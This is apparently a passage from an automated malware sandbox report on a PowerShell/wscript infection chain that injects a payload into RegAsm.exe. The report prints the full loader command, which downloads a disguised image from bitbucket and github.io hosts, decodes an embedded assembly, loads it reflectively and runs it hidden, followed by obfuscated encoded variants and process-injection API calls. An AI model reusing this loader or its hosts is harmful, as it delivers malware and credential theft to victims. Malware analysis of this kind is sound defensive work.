                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 36000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 35890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 35781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 35672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 35562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 35453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 35344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 35219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 35109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 34999Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 34890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 34780Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 34637Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 34531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 34422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 34310Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 34203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 34094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 33969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 33859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 33750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 33640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 33531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: RegAsm.exe, 00000006.00000002.1619760521.00000000032A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: RegAsm.exe, 00000006.00000002.1645949048.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                Source: RegAsm.exe, 00000006.00000002.1619760521.00000000032A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                Source: RegAsm.exe, 00000006.00000002.1619760521.00000000032A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: RegAsm.exe, 00000006.00000002.1629135916.0000000004363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_6164.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 976, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6164, type: MEMORYSTR
                .NET source code references suspicious native API functions
                Source: 4.2.powershell.exe.1be201a0000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                Source: 4.2.powershell.exe.1be201a0000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                Source: 4.2.powershell.exe.1be201a0000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
                Source: 4.2.powershell.exe.1be201a0000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
                Source: 4.2.powershell.exe.1be201a0000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
                Injects a PE file into a foreign processes
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45C000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10E5008Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.dfgdmAI/niam/sdaeh/sfer/k63/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gm@ywbj@gm@ywbj@gm@ywbj@gm@ywbj@g4@bqbm@gc@lwbn@hy@z@bm@gg@z@@v@gq@bwb3@g4@b@bv@ge@z@bz@c8@d@bl@hm@d@@u@go@c@bn@d8@mq@z@dc@mq@x@dm@jw@s@c@@jwbo@hq@d@bw@hm@og@v@c8@bwbm@gk@ywbl@dm@ng@1@c4@zwbp@hq@a@b1@gi@lgbp@g8@lw@x@c8@d@bl@hm@d@@u@go@c@bn@cc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@r@d0@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c4@t@bl@g4@zwb0@gg@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gi@yqbz@gu@ng@0@ew@zqbu@gc@d@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lq@g@c
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] ('txt.dfgdmai/niam/sdaeh/sfer/k63/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 